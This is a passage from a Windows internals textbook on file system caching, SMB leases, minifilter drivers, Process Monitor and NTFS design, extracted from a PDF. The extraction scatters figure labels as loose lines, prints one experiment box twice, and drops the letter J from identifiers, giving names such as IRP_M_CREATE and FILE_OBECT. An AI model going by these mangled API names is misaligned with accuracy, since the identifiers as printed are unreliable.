cess. This lock allows the client to perform read-ahead buffering and read or write caching.
I
Read-Write-Handle (RWH), exclusive access
This lock allows a client to open a file
for exclusive access. This lease supports read, write, and handle caching (similar to the
Read-Handle lease).
Another advantage that a lease has over an oplock is that a file may be cached, even when there are
multiple handles opened to the file on the client. (This is a common behavior in many applications.) This
is implemented through the use of a lease key (implemented using a GUID), which is created by the client
and associated with the File Control Block (FCB) for the cached file, allowing all handles to the same file to
share the same lease state, which provides caching by file rather than caching by handle. Prior to the in-
troduction of the lease, the oplock was broken whenever a new handle was opened to the file, even from
the same client. Figure 11-20 shows the oplock behavior, and Figure 11-21 shows the new lease behavior.
Prior to SMB 2.1, oplocks could only be granted or broken, but leases can also be converted. For
example, a Read lease may be converted to a Read-Write lease, which greatly reduces network traffic
because the cache for a particular file does not need to be invalidated and refilled, as would be the case
with an oplock break (of the Level 2 oplock), followed by the request and grant of a Level 1 oplock.
616
CHAPTER 11
Caching and file systems
Client
Windows
Network
Server
Application A
opens a file on
a server
Application A
receives a handle
to the file on
the server
Application A
issues a read
to the file
Application A
receives only the
amount of data
it requested
Application A
issues a read to
the file within
the area cached
Application B
opens the same
file on the server
for read access
Application A
issues a write to
the file within
the area cached
Application B
receives a handle
to the file on
the server
Application A
issues a read to
the file for an
area that was
previously cached
Application A
issues a write to
the file in an
area that was
previously
cached
First handle
on the
file opened
Data read
from file
Server
opens
second
handle
to file
Data read
from file
Data
written
to file
Batch oplock granted
Read data returned
Server unaware
Server unaware
No network packets
No network packets
Batch oplock broken
Read data returned
Write data to server
Read data from server
Cache flushed and no more
caching allowed on the file
Read-ahead data written
to cache
Read data and
read-ahead from server
CreateFile (with
FILE_GENERIC_READ and
FILE_GENERIC_WRITE)
CreateFile (same file with
FILE_GENERIC_READ)
I/O complete
Data given to application
I/O complete
WriteFile
WriteFile
ReadFile
ReadFile
ReadFile
Handle
Handle
I/O complete
Data given to application
I/O complete
Cached data given to application
I/O complete
FIGURE 11-20 Oplock with multiple handles from the same client.
CHAPTER 11
Caching and file systems
617
Client
Windows
Network
Server
Application A
opens a file on
a server
Application A
receives a handle
to the file on
the server
Application A
issues a read
to the file
Application A
receives only the
amount of data
it requested
Application A
issues a read to
the file within
the area cached
Application B
opens the same
file on the server
for read access
Application A
issues a write to
the file within
the area cached
Application B
receives a handle
to the file on
the server
Application B
issues a read to
the file to an area
that is cached
Application A
issues a write to
the file in an area
that is cached
First handle
on the
file opened
Data read
from file
Server
opens
second
handle
to file; lease
remains
Data written
to the
cache will
eventually
be flushed
to the
server by
the client
Read-Handle lease granted
Read data returned
Server unaware
Server unaware
No network packets
No network packets
Cache flushed and no more
caching allowed on the file
Read-ahead data written
to cache
Read data and
read-ahead from server
CreateFile (with
FILE_GENERIC_READ and
FILE_GENERIC_WRITE)
CreateFile (same file with
FILE_GENERIC_READ)
I/O complete
Cache data given to application
I/O complete
WriteFile
WriteFile
ReadFile
ReadFile
ReadFile
Handle
Handle
I/O complete
Data given to application
I/O complete
Cached data given to application
I/O complete
Server unaware
Server unaware
No network packets
No network packets
FIGURE 11-21 Lease with multiple handles from the same client.
618
CHAPTER 11
Caching and file systems
File system operations
Applications and the system access files in two ways: directly, via file I/O functions (such as ReadFile
and WriteFile), and indirectly, by reading or writing a portion of their address space that represents a
mapped file section. (See Chapter 5 of Part 1 for more information on mapped files.) Figure 11-22 is a
simplified diagram that shows the components involved in these file system operations and the ways in
which they interact. As you can see, an FSD can be invoked through several paths:
I
From a user or system thread performing explicit file I/O
I
From the memory manager’s modified and mapped page writers
I
Indirectly from the cache manager’s lazy writer
I
Indirectly from the cache manager’s read-ahead thread
I
From the memory manager’s page fault handler
Process
Handle
table
File object
File object
Data
attribute
File
control
block
Named
stream
NTFS data
structures
Stream
control
blocks
...
Object
manager
data
structures
Master file
table
...
NTFS
database
(on disk)
FIGURE 11-22 Components involved in file system I/O.
The following sections describe the circumstances surrounding each of these scenarios and the
steps FSDs typically take in response to each one. You’ll see how much FSDs rely on the memory man-
ager and the cache manager.
CHAPTER 11
Caching and file systems
619
Explicit file I/O
The most obvious way an application accesses files is by calling Windows I/O functions such as
CreateFile, ReadFile, and WriteFile. An application opens a file with CreateFile and then reads, writes,
or deletes the file by passing the handle returned from CreateFile to other Windows functions. The
CreateFile function, which is implemented in the Kernel32.dll Windows client-side DLL, invokes the
native function NtCreateFile, forming a complete root-relative path name for the path that the applica-
tion passed to it (processing “.” and “..” symbols in the path name) and prefixing the path with “\??” (for
example, \??\C:\Daryl\Todo.txt).
The NtCreateFile system service uses ObOpenObectByName to open the file, which parses the
name starting with the object manager root directory and the first component of the path name (“??”).
Chapter 8, “System mechanisms”, includes a thorough description of object manager name resolution
and its use of process device maps, but we’ll review the steps it follows here with a focus on volume
drive letter lookup.
The first step the object manager takes is to translate \?? to the process’s per-session namespace di-
rectory that the DosDevicesDirectory field of the device map structure in the process object references
(which was propagated from the first process in the logon session by using the logon session referenc-
es field in the logon session’s token). Only volume names for network shares and drive letters mapped
by the Subst.exe utility are typically stored in the per-session directory, so on those systems when a
name (C: in this example) is not present in the per-session directory, the object manager restarts its
search in the directory referenced by the GlobalDosDevicesDirectory field of the device map associated
with the per-session directory. The GlobalDosDevicesDirectory field always points at the \GLOBAL?? di-
rectory, which is where Windows stores volume drive letters for local volumes. (See the section “Session
namespace” in Chapter 8 for more information.) Processes can also have their own device map, which is
an important characteristic during impersonation over protocols such as RPC.
The symbolic link for a volume drive letter points to a volume device object under \Device, so when
the object manager encounters the volume object, the object manager hands the rest of the path
name to the parse function that the I/O manager has registered for device objects, IopParseDevice.
(In volumes on dynamic disks, a symbolic link points to an intermediary symbolic link, which points
to a volume device object.) Figure 11-23 shows how volume objects are accessed through the object
manager namespace. The figure shows how the \GLOBAL??\C: symbolic link points to the \Device\
HarddiskVolume6 volume device object.
After locking the caller’s security context and obtaining security information from the caller’s token,
IopParseDevice creates an I/O request packet (IRP) of type IRP_M_CREATE, creates a file object that
stores the name of the file being opened, follows the VPB of the volume device object to find the vol-
ume’s mounted file system device object, and uses IoCallDriver to pass the IRP to the file system driver
that owns the file system device object.
When an FSD receives an IRP_M_CREATE IRP, it looks up the specified file, performs security valida-
tion, and if the file exists and the user has permission to access the file in the way requested, returns
a success status code. The object manager creates a handle for the file object in the process’s handle
table, and the handle propagates back through the calling chain, finally reaching the application as a
620
CHAPTER 11
Caching and file systems
return parameter from CreateFile. If the file system fails the create operation, the I/O manager deletes
the file object it created for the file.
We’ve skipped over the details of how the FSD locates the file being opened on the volume, but
a ReadFile function call operation shares many of the FSD’s interactions with the cache manager and
storage driver. Both ReadFile and CreateFile are system calls that map to I/O manager functions, but
the NtReadFile system service doesn’t need to perform a name lookup; it calls on the object manager
to translate the handle passed from ReadFile into a file object pointer. If the handle indicates that the
caller obtained permission to read the file when the file was opened, NtReadFile proceeds to create an
IRP of type IRP_M_READ and sends it to the FSD for the volume on which the file resides. NtReadFile
obtains the FSD’s device object, which is stored in the file object, and calls IoCallDriver, and the I/O
manager locates the FSD from the device object and gives the IRP to the FSD.
FIGURE 11-23 Drive-letter name resolution.
CHAPTER 11
Caching and file systems
621
If the file being read can be cached (that is, the FILE_FLAG_NO_BUFFERING flag wasn’t passed to
CreateFile when the file was opened), the FSD checks to see whether caching has already been initiated
for the file object. The PrivateCacheMap field in a file object points to a private cache map data struc-
ture (which we described in the previous section) if caching is initiated for a file object. If the FSD hasn’t
initialized caching for the file object (which it does the first time a file object is read from or written to),
the PrivateCacheMap field will be null. The FSD calls the cache manager’s CcInitializeCacheMap function
to initialize caching, which involves the cache manager creating a private cache map and, if another file
object referring to the same file hasn’t initiated caching, a shared cache map and a section object.
After it has verified that caching is enabled for the file, the FSD copies the requested file data from
the cache manager’s virtual memory to the buffer that the thread passed to the ReadFile function. The
file system performs the copy within a try/except block so that it catches any faults that are the result of
an invalid application buffer. The function the file system uses to perform the copy is the cache man-
ager’s CcCopyRead function. CcCopyRead takes as parameters a file object, file offset, and length.
When the cache manager executes CcCopyRead, it retrieves a pointer to a shared cache map, which
is stored in the file object. Recall that a shared cache map stores pointers to virtual address control
blocks (VACBs), with one VACB entry for each 256 KB block of the file. If the VACB pointer for a portion
of a file being read is null, CcCopyRead allocates a VACB, reserving a 256 KB view in the cache man-
ager’s virtual address space, and maps (using MmMapViewInSystemCache) the specified portion of the
file into the view. Then CcCopyRead simply copies the file data from the mapped view to the buffer it
was passed (the buffer originally passed to ReadFile). If the file data isn’t in physical memory, the copy
operation generates page faults, which are serviced by MmAccessFault.
When a page fault occurs, MmAccessFault examines the virtual address that caused the fault and
locates the virtual address descriptor (VAD) in the VAD tree of the process that caused the fault. (See
Chapter 5 of Part 1 for more information on VAD trees.) In this scenario, the VAD describes the cache
manager’s mapped view of the file being read, so MmAccessFault calls MiDispatchFault to handle a page
fault on a valid virtual memory address. MiDispatchFault locates the control area (which the VAD points
to) and through the control area finds a file object representing the open file. (If the file has been opened
more than once, there might be a list of file objects linked through pointers in their private cache maps.)
With the file object in hand, MiDispatchFault calls the I/O manager function IoPageRead to build
an IRP (of type IRP_M_READ) and sends the IRP to the FSD that owns the device object the file object
points to. Thus, the file system is reentered to read the data that it requested via CcCopyRead, but this
time the IRP is marked as noncached and paging I/O. These flags signal the FSD that it should retrieve
file data directly from disk, and it does so by determining which clusters on disk contain the requested
data (the exact mechanism is file-system dependent) and sending IRPs to the volume manager that
owns the volume device object on which the file resides. The volume parameter block (VPB) field in the
FSD’s device object points to the volume device object.
The memory manager waits for the FSD to complete the IRP read and then returns control to
the cache manager, which continues the copy operation that was interrupted by a page fault. When
CcCopyRead completes, the FSD returns control to the thread that called NtReadFile, having copied the
requested file data, with the aid of the cache manager and the memory manager, to the thread’s buffer.
622
CHAPTER 11
Caching and file systems
The path for WriteFile is similar except that the NtWriteFile system service generates an IRP of type
IRP_M_WRITE, and the FSD calls CcCopyWrite instead of CcCopyRead. CcCopyWrite, like CcCopyRead,
ensures that the portions of the file being written are mapped into the cache and then copies to the
cache the buffer passed to WriteFile.
If a file’s data is already cached (in the system’s working set), there are several variants on the
scenario we’ve just described. If a file’s data is already stored in the cache, CcCopyRead doesn’t incur
page faults. Also, under certain conditions, NtReadFile and NtWriteFile call an FSD’s fast I/O entry point
instead of immediately building and sending an IRP to the FSD. Some of these conditions follow: the
portion of the file being read must reside in the first 4 GB of the file, the file can have no locks, and
the portion of the file being read or written must fall within the file’s currently allocated size.
The fast I/O read and write entry points for most FSDs call the cache manager’s CcFastCopyRead
and CcFastCopyWrite functions. These variants on the standard copy routines ensure that the file’s
data is mapped in the file system cache before performing a copy operation. If this condition isn’t met,
CcFastCopyRead and CcFastCopyWrite indicate that fast I/O isn’t possible. When fast I/O isn’t possible,
NtReadFile and NtWriteFile fall back on creating an IRP. (See the earlier section “Fast I/O” for a more
complete description of fast I/O.)
Memory manager’s modified and mapped page writer
The memory manager’s modified and mapped page writer threads wake up periodically (and when
available memory runs low) to flush modified pages to their backing store on disk. The threads call
IoAsynchronousPageWrite to create IRPs of type IRP_M_WRITE and write pages to either a paging file
or a file that was modified after being mapped. Like the IRPs that MiDispatchFault creates, these IRPs
are flagged as noncached and paging I/O. Thus, an FSD bypasses the file system cache and issues IRPs
directly to a storage driver to write the memory to disk.
Cache manager’s lazy writer
The cache manager’s lazy writer thread also plays a role in writing modified pages because it periodi-
cally flushes views of file sections mapped in the cache that it knows are dirty. The flush operation,
which the cache manager performs by calling MmFlushSection, triggers the memory manager to write
any modified pages in the portion of the section being flushed to disk. Like the modified and mapped
page writers, MmFlushSection uses IoSynchronousPageWrite to send the data to the FSD.
Cache manager’s read-ahead thread
A cache uses two artifacts of how programs reference code and data: temporal locality and spatial
locality. The underlying concept behind temporal locality is that if a memory location is referenced,
it is likely to be referenced again soon. The idea behind spatial locality is that if a memory location is
referenced, other nearby locations are also likely to be referenced soon. Thus, a cache typically is very
good at speeding up access to memory locations that have been accessed in the near past, but it’s ter-
rible at speeding up access to areas of memory that have not yet been accessed (it has zero lookahead
CHAPTER 11
Caching and file systems
623
capability). In an attempt to populate the cache with data that will likely be used soon, the cache man-
ager implements two mechanisms: a read-ahead thread and Superfetch.
As we described in the previous section, the cache manager includes a thread that is responsible for
attempting to read data from files before an application, a driver, or a system thread explicitly requests
it. The read-ahead thread uses the history of read operations that were performed on a file, which
are stored in a file object’s private cache map, to determine how much data to read. When the thread
performs a read-ahead, it simply maps the portion of the file it wants to read into the cache (allocating
VACBs as necessary) and touches the mapped data. The page faults caused by the memory accesses
invoke the page fault handler, which reads the pages into the system’s working set.
A limitation of the read-ahead thread is that it works only on open files. Superfetch was added to
Windows to proactively add files to the cache before they’re even opened. Specifically, the memory
manager sends page-usage information to the Superfetch service (%SystemRoot%\System32\Sysmain.
dll), and a file system minifilter provides file name resolution data. The Superfetch service attempts
to find file-usage patterns—for example, payroll is run every Friday at 12:00, or Outlook is run every
morning at 8:00. When these patterns are derived, the information is stored in a database and tim-
ers are requested. Just prior to the time the file would most likely be used, a timer fires and tells the
memory manager to read the file into low-priority memory (using low-priority disk I/O). If the file is
then opened, the data is already in memory, and there’s no need to wait for the data to be read from
disk. If the file isn’t opened, the low-priority memory will be reclaimed by the system. The internals and
full description of the Superfetch service were previously described in Chapter 5, Part 1.
Memory manager’s page fault handler
We described how the page fault handler is used in the context of explicit file I/O and cache manager
read-ahead, but it’s also invoked whenever any application accesses virtual memory that is a view of
a mapped file and encounters pages that represent portions of a file that aren’t yet in memory. The
memory manager’s MmAccessFault handler follows the same steps it does when the cache manager
generates a page fault from CcCopyRead or CcCopyWrite, sending IRPs via IoPageRead to the file sys-
tem on which the file is stored.
File system filter drivers and minifilters
A filter driver that layers over a file system driver is called a file system filter driver. Two types of file
system filter drivers are supported by the Windows I/O model:
I
Legacy file system filter drivers usually create one or multiple device objects and attach them
on the file system device through the IoAttachDeviceToDeviceStack API. Legacy filter drivers
intercept all the requests coming from the cache manager or I/O manager and must implement
both standard IRP dispatch functions and the Fast I/O path. Due to the complexity involved in
the development of this kind of driver (synchronization issues, undocumented interfaces, de-
pendency on the original file system, and so on), Microsoft has developed a unified filter model
that makes use of special drivers, called minifilters, and deprecated legacy file system drivers.
(The IoAttachDeviceToDeviceStack API fails when it’s called for DAX volumes).
624
CHAPTER 11
Caching and file systems
I
Minifilters drivers are clients of the Filesystem Filter Manager (Fltmgr.sys). The Filesystem Filter
Manager is a legacy file system filter driver that provides a rich and documented interface for the
creation of file system filters, hiding the complexity behind all the interactions between the file
system drivers and the cache manager. Minifilters register with the filter manager through the
FltRegisterFilter API. The caller usually specifies an instance setup routine and different operation
callbacks. The instance setup is called by the filter manager for every valid volume device that a
file system manages. The minifilter has the chance to decide whether to attach to the volume.
Minifilters can specify a Pre and Post operation callback for every major IRP function code, as well
as certain “pseudo-operations” that describe internal memory manager or cache manager se-
mantics that are relevant to file system access patterns. The Pre callback is executed before the I/O
is processed by the file system driver, whereas the Post callback is executed after the I/O operation
has been completed. The Filter Manager also provides its own communication facility that can be
employed between minifilter drivers and their associated user-mode application.
The ability to see all file system requests and optionally modify or complete them enables a range
of applications, including remote file replication services, file encryption, efficient backup, and licens-
ing. Every anti-malware product typically includes at least a minifilter driver that intercepts applications
opening or modifying files. For example, before propagating the IRP to the file system driver to which
the command is directed, a malware scanner examines the file being opened to ensure that it’s clean.
If the file is clean, the malware scanner passes the IRP on, but if the file is infected, the malware scan-
ner quarantines or cleans the file. If the file can’t be cleaned, the driver fails the IRP (typically with an
access-denied error) so that the malware cannot become active.
Deeply describing the entire minifilter and legacy filter driver architecture is outside the scope
of this chapter. You can find more information on the legacy filter driver architecture in Chapter 6,
“I/O System,” of Part 1. More details on minifilters are available in MSDN (https://docs.microsoft.com
/en-us/windows-hardware/drivers/ifs/file-system-minifilter-drivers).
Data-scan sections
Starting with Windows 8.1, the Filter Manager collaborates with file system drivers to provide data-scan
section objects that can be used by anti-malware products. Data-scan section objects are similar to
standard section objects (for more information about section objects, see Chapter 5 of Part 1) except
for the following:
I
Data-scan section objects can be created from minifilter callback functions, namely from call-
backs that manage the IRP_M_CREATE function code. These callbacks are called by the filter
manager when an application is opening or creating a file. An anti-malware scanner can create
a data-scan section and then start scanning before completing the callback.
I
FltCreateSectionForDataScan, the API used for creating data-scan sections, accepts a FILE_
OBECT pointer. This means that callers don’t need to provide a file handle. The file handle
typically doesn’t yet exist, and would thus need to be (re)created by using FltCreateFile API,
which would then have created other file creation IRPs, recursively interacting with lower level
file system filters once again. With the new API, the process is much faster because these extra
recursive calls won’t be generated.
CHAPTER 11
Caching and file systems
625
A data-scan section can be mapped like a normal section using the traditional API. This allows anti-
malware applications to implement their scan engine either as a user-mode application or in a kernel-
mode driver. When the data-scan section is mapped, IRP_M_READ events are still generated in the mini-
filter driver, but this is not a problem because the minifilter doesn’t have to include a read callback at all.
Filtering named pipes and mailslots
When a process belonging to a user application needs to communicate with another entity (a pro-
cess, kernel driver, or remote application), it can leverage facilities provided by the operating system.
The most traditionally used are named pipes and mailslots, because they are portable among other
operating systems as well. A named pipe is a named, one-way communication channel between a pipe
server and one or more pipe clients. All instances of a named pipe share the same pipe name, but each
instance has its own buffers and handles, and provides a separate channel for client/server communi-
cation. Named pipes are implemented through a file system driver, the NPFS driver (Npfs.sys).
A mailslot is a multi-way communication channel between a mailslot server and one or more clients.
A mailslot server is a process that creates a mailslot through the CreateMailslot Win32 API, and can only
read small messages (424 bytes maximum when sent between remote computers) generated by one or
more clients. Clients are processes that write messages to the mailslot. Clients connect to the mailslot
through the standard CreateFile API and send messages through the WriteFile function. Mailslots are
generally used for broadcasting messages within a domain. If several server processes in a domain each
create a mailslot using the same name, every message that is addressed to that mailslot and sent to the
domain is received by the participating processes. Mailslots are implemented through the Mailslot file
system driver, Msfs.sys.
Both the mailslot and NPFS driver implement simple file systems. They manage namespaces com-
posed of files and directories, which support security, can be opened, closed, read, written, and so on.
Describing the implementation of the two drivers is outside the scope of this chapter.
Starting with Windows 8, mailslots and named pipes are supported by the Filter Manager. Minifilters
are able to attach to the mailslot and named pipe volumes (\Device\NamedPipe and \Device\Mailslot,
which are not real volumes), through the FLTFL_REGISTRATION_SUPPORT_NPFS_MSFS flag specified
at registration time. A minifilter can then intercept and modify all the named pipe and mailslot I/O
that happens between local and remote process and between a user application and its kernel driver.
Furthermore, minifilters can open or create a named pipe or mailslot without generating recursive
events through the FltCreateNamedPipeFile or FltCreateMailslotFile APIs.
Note One of the motivations that explains why the named pipe and mailslot file system
drivers are simpler compared to NTFS and ReFs is that they do not interact heavily with
the cache manager. The named pipe driver implements the Fast I/O path but with no
cached read or write-behind support. The mailslot driver does not interact with the cache
manager at all.
626
CHAPTER 11
Caching and file systems
Controlling reparse point behavior
The NTFS file system supports the concept of reparse points, blocks of 16 KB of application and system-
defined reparse data that can be associated to single files. (Reparse points are discussed more in mul-
tiple sections later in this chapter.) Some types of reparse points, like volume mount points or symbolic
links, contain a link between the original file (or an empty directory), used as a placeholder, and an-
other file, which can even be located in another volume. When the NTFS file system driver encounters
a reparse point on its path, it returns an error code to the upper driver in the device stack. The latter
(which could be another filter driver) analyzes the reparse point content and, in the case of a symbolic
link, re-emits another I/O to the correct volume device.
This process is complex and cumbersome for any filter driver. Minifilters drivers can intercept the
STATUS_REPARSE error code and reopen the reparse point through the new FltCreateFileEx2 API,
which accepts a list of Extra Create Parameters (also known as ECPs), used to fine-tune the behavior
of the opening/creation process of a target file in the minifilter context. In general, the Filter Manager
supports different ECPs, and each of them is uniquely identified by a GUID. The Filter Manager pro-
vides multiple documented APIs that deal with ECPs and ECP lists. Usually, minifilters allocate an
ECP with the FltAllocateExtraCreateParameter function, populate it, and insert it into a list (through
FltInsertExtraCreateParameter) before calling the Filter Manager’s I/O APIs.
The FLT_CREATEFILE_TARGET extra creation parameter allows the Filter Manager to manage cross-
volume file creation automatically (the caller needs to specify a flag). Minifilters don’t need to perform
any other complex operation.
With the goal of supporting container isolation, it’s also possible to set a reparse point on nonempty
directories and, in order to support container isolation, create new files that have directory reparse
points. The default behavior that the file system has while encountering a nonempty directory reparse
point depends on whether the reparse point is applied in the last component of the file full path. If this
is the case, the file system returns the STATUS_REPARSE error code, just like for an empty directory;
otherwise, it continues to walk the path.
The Filter Manager is able to correctly deal with this new kind of reparse point through another ECP
(named TYPE_OPEN_REPARSE). The ECP includes a list of descriptors (OPEN_REPARSE_LIST_ ENTRY
data structure), each of which describes the type of reparse point (through its Reparse Tag), and the
behavior that the system should apply when it encounters a reparse point of that type while parsing
a path. Minifilters, after they have correctly initialized the descriptor list, can apply the new behavior in
different ways:
I
Issue a new open (or create) operation on a file that resides in a path that includes a reparse
point in any of its components, using the FltCreateFileEx2 function. This procedure is similar to
the one used by the FLT_CREATEFILE_TARGET ECP.
I
Apply the new reparse point behavior globally to any file that the Pre-Create callback inter-
cepts. The FltAddOpenReparseEntry and FltRemoveOpenReparseEntry APIs can be used to set
the reparse point behavior to a target file before the file is actually created (the pre-creation
callback intercepts the file creation request before the file is created). The Windows Container
Isolation minifilter driver (Wcifs.sys) uses this strategy.
CHAPTER 11
Caching and file systems
627
Process Monitor
Process Monitor (Procmon), a system activity-monitoring utility from Sysinternals that has been used
throughout this book, is an example of a passive minifilter driver, which is one that does not modify the
flow of IRPs between applications and file system drivers.
Process Monitor works by extracting a file system minifilter device driver from its executable image
(stored as a resource inside Procmon.exe) the first time you run it after a boot, installing the driver in
memory, and then deleting the driver image from disk (unless configured for persistent boot-time
monitoring). Through the Process Monitor GUI, you can direct the driver to monitor file system activity
on local volumes that have assigned drive letters, network shares, named pipes, and mail slots. When
the driver receives a command to start monitoring a volume, it registers filtering callbacks with the
Filter Manager, which is attached to the device object that represents a mounted file system on the
volume. After an attach operation, the I/O manager redirects an IRP targeted at the underlying device
object to the driver owning the attached device, in this case the Filter Manager, which sends the event
to registered minifilter drivers, in this case Process Monitor.
When the Process Monitor driver intercepts an IRP, it records information about the IRP’s com-
mand, including target file name and other parameters specific to the command (such as read and
write lengths and offsets) to a nonpaged kernel buffer. Every 500 milliseconds, the Process Monitor GUI
program sends an IRP to Process Monitor’s interface device object, which requests a copy of the buf-
fer containing the latest activity, and then displays the activity in its output window. Process Monitor
shows all file activity as it occurs, which makes it an ideal tool for troubleshooting file system–related
system and application failures. To run Process Monitor the first time on a system, an account must
have the Load Driver and Debug privileges. After loading, the driver remains resident, so subsequent
executions require only the Debug privilege.
When you run Process Monitor, it starts in basic mode, which shows the file system activity most
often useful for troubleshooting. When in basic mode, Process Monitor omits certain file system opera-
tions from being displayed, including
I
I/O to NTFS metadata files
I
I/O to the paging file
I
I/O generated by the System process
I
I/O generated by the Process Monitor process
While in basic mode, Process Monitor also reports file I/O operations with friendly names rather
than with the IRP types used to represent them. For example, both IRP_M_WRITE and FASTIO_WRITE
operations display as WriteFile, and IRP_M_CREATE operations show as Open if they represent an open
operation and as Create for the creation of new files.
628
CHAPTER 11
Caching and file systems
EXPERIMENT: Viewing Process Monitor’s minifilter driver
To see which file system minifilter drivers are loaded, start an Administrative command prompt,
and run the Filter Manager control program (%SystemRoot%\System32\Fltmc.exe). Start Process
Monitor (ProcMon.exe) and run Fltmc again. You see that the Process Monitor’s filter driver
(PROCMON20) is loaded and has a nonzero value in the Instances column. Now, exit Process
Monitor and run Fltmc again. This time, you see that the Process Monitor’s filter driver is still
loaded, but now its instance count is zero.
The NT File System (NTFS)
In the following section, we analyze the internal architecture of the NTFS file system, starting by look-
ing at the requirements that drove its design. We examine the on-disk data structures, and then we
move on to the advanced features provided by the NTFS file system, like the Recovery support, tiered
volumes, and the Encrypting File System (EFS).
High-end file system requirements
From the start, NTFS was designed to include features required of an enterprise-class file system. To
minimize data loss in the face of an unexpected system outage or crash, a file system must ensure that
the integrity of its metadata is guaranteed at all times; and to protect sensitive data from unauthorized
access, a file system must have an integrated security model. Finally, a file system must allow for soft-
ware-based data redundancy as a low-cost alternative to hardware-redundant solutions for protecting
user data. In this section, you find out how NTFS implements each of these capabilities.
EXPERIMENT: Viewing Process Monitor’s minifilter driver
To see which file system minifilter drivers are loaded, start an Administrative command prompt,
and run the Filter Manager control program (%SystemRoot%\System32\Fltmc.exe). Start Process
Monitor (ProcMon.exe) and run Fltmc again. You see that the Process Monitor’s filter driver
(PROCMON20) is loaded and has a nonzero value in the Instances column. Now, exit Process
Monitor and run Fltmc again. This time, you see that the Process Monitor’s filter driver is still
loaded, but now its instance count is zero.
CHAPTER 11
Caching and file systems
629
Recoverability
To address the requirement for reliable data storage and data access, NTFS provides file system recov-
ery based on the concept of an atomic transaction. Atomic transactions are a technique for handling
modifications to a database so that system failures don’t affect the correctness or integrity of the
database. The basic tenet of atomic transactions is that some database operations, called transactions,
are all-or-nothing propositions. (A transaction is defined as an I/O operation that alters file system data
or changes the volume’s directory structure.) The separate disk updates that make up the transaction
must be executed atomically—that is, once the transaction begins to execute, all its disk updates must
be completed. If a system failure interrupts the transaction, the part that has been completed must be
undone, or rolled back. The rollback operation returns the database to a previously known and consis-
tent state, as if the transaction had never occurred.
NTFS uses atomic transactions to implement its file system recovery feature. If a program initiates
an I/O operation that alters the structure of an NTFS volume—that is, changes the directory structure,
extends a file, allocates space for a new file, and so on—NTFS treats that operation as an atomic trans-
action. It guarantees that the transaction is either completed or, if the system fails while executing the
transaction, rolled back. The details of how NTFS does this are explained in the section “NTFS recovery
support” later in the chapter. In addition, NTFS uses redundant storage for vital file system information
so that if a sector on the disk goes bad, NTFS can still access the volume’s critical file system data.
Security
Security in NTFS is derived directly from the Windows object model. Files and directories are protected
from being accessed by unauthorized users. (For more information on Windows security, see Chapter
7, “Security,” in Part 1.) An open file is implemented as a file object with a security descriptor stored on
disk in the hidden Secure metafile, in a stream named SDS (Security Descriptor Stream). Before a
process can open a handle to any object, including a file object, the Windows security system verifies
that the process has appropriate authorization to do so. The security descriptor, combined with the
requirement that a user log on to the system and provide an identifying password, ensures that no pro-
cess can access a file unless it is given specific permission to do so by a system administrator or by the
file’s owner. (For more information about security descriptors, see the section “Security descriptors and
access control” in Chapter 7 in Part 1).
Data redundancy and fault tolerance
In addition to recoverability of file system data, some customers require that their data not be endan-
gered by a power outage or catastrophic disk failure. The NTFS recovery capabilities ensure that the
file system on a volume remains accessible, but they make no guarantees for complete recovery of user
files. Protection for applications that can’t risk losing file data is provided through data redundancy.
Data redundancy for user files is implemented via the Windows layered driver, which provides
fault-tolerant disk support. NTFS communicates with a volume manager, which in turn communicates
with a disk driver to write data to a disk. A volume manager can mirror, or duplicate, data from one disk
onto another disk so that a redundant copy can always be retrieved. This support is commonly called
630
CHAPTER 11
Caching and file systems
RAID level 1. Volume managers also allow data to be written in stripes across three or more disks, using
the equivalent of one disk to maintain parity information. If the data on one disk is lost or becomes
inaccessible, the driver can reconstruct the disk’s contents by means of exclusive-OR operations. This
support is called RAID level 5.
In Windows 7, data redundancy for NTFS implemented via the Windows layered driver was provided
by Dynamic Disks. Dynamic Disks had multiple limitations, which have been overcome in Windows 8.1
by introducing a new technology that virtualizes the storage hardware, called Storage Spaces. Storage
Spaces is able to create virtual disks that already provide data redundancy and fault tolerance. The
volume manager doesn’t differentiate between a virtual disk and a real disk (so user mode components
can’t see any difference between the two). The NTFS file system driver cooperates with Storage Spaces
for supporting tiered disks and RAID virtual configurations. Storage Spaces and Spaces Direct will be
covered later in this chapter.
Advanced features of NTFS
In addition to NTFS being recoverable, secure, reliable, and efficient for mission-critical systems, it
includes the following advanced features that allow it to support a broad range of applications. Some
of these features are exposed as APIs for applications to leverage, and others are internal features:
I
Multiple data streams
I
Unicode-based names
I
General indexing facility
I
Dynamic bad-cluster remapping
I
Hard links
I
Symbolic (soft) links and junctions
I
Compression and sparse files
I
Change logging
I
Per-user volume quotas
I
Link tracking
I
Encryption
I
POSIX support
I
Defragmentation
I
Read-only support and dynamic partitioning
I
Tiered volume support
The following sections provide an overview of these features.
CHAPTER 11
Caching and file systems
631
Multiple data streams
In NTFS, each unit of information associated with a file—including its name, its owner, its time stamps,
its contents, and so on—is implemented as a file attribute (NTFS object attribute). Each attribute con-
sists of a single stream—that is, a simple sequence of bytes. This generic implementation makes it easy
to add more attributes (and therefore more streams) to a file. Because a file’s data is “just another at-
tribute” of the file and because new attributes can be added, NTFS files (and file directories) can contain
multiple data streams.
An NTFS file has one default data stream, which has no name. An application can create additional,
named data streams and access them by referring to their names. To avoid altering the Windows I/O
APIs, which take a string as a file name argument, the name of the data stream is specified by append-
ing a colon (:) to the file name. Because the colon is a reserved character, it can serve as a separator
between the file name and the data stream name, as illustrated in this example:
myfile.dat:stream2
Each stream has a separate allocation size (which defines how much disk space has been reserved
for it), actual size (which is how many bytes the caller has used), and valid data length (which is how
much of the stream has been initialized). In addition, each stream is given a separate file lock that is
used to lock byte ranges and to allow concurrent access.
One component in Windows that uses multiple data streams is the Attachment Execution Service,
which is invoked whenever the standard Windows API for saving internet-based attachments is used by
applications such as Edge or Outlook. Depending on which zone the file was downloaded from (such as
the My Computer zone, the Intranet zone, or the Untrusted zone), Windows Explorer might warn the
user that the file came from a possibly untrusted location or even completely block access to the file.
For example, Figure 11-24 shows the dialog box that’s displayed when executing Process Explorer after
it was downloaded from the Sysinternals site. This type of data stream is called the Zone.Identifier and
is colloquially referred to as the “Mark of the Web.”
Note If you clear the check box for Always Ask Before Opening This File, the zone identifier
data stream will be removed from the file.
FIGURE 11-24 Security warning for files downloaded from the internet.
632
CHAPTER 11
Caching and file systems
Other applications can use the multiple data stream feature as well. A backup utility, for example,
might use an extra data stream to store backup-specific time stamps on files. Or an archival utility
might implement hierarchical storage in which files that are older than a certain date or that haven’t
been accessed for a specified period of time are moved to offline storage. The utility could copy the file
to offline storage, set the file’s default data stream to 0, and add a data stream that specifies where the
file is stored.
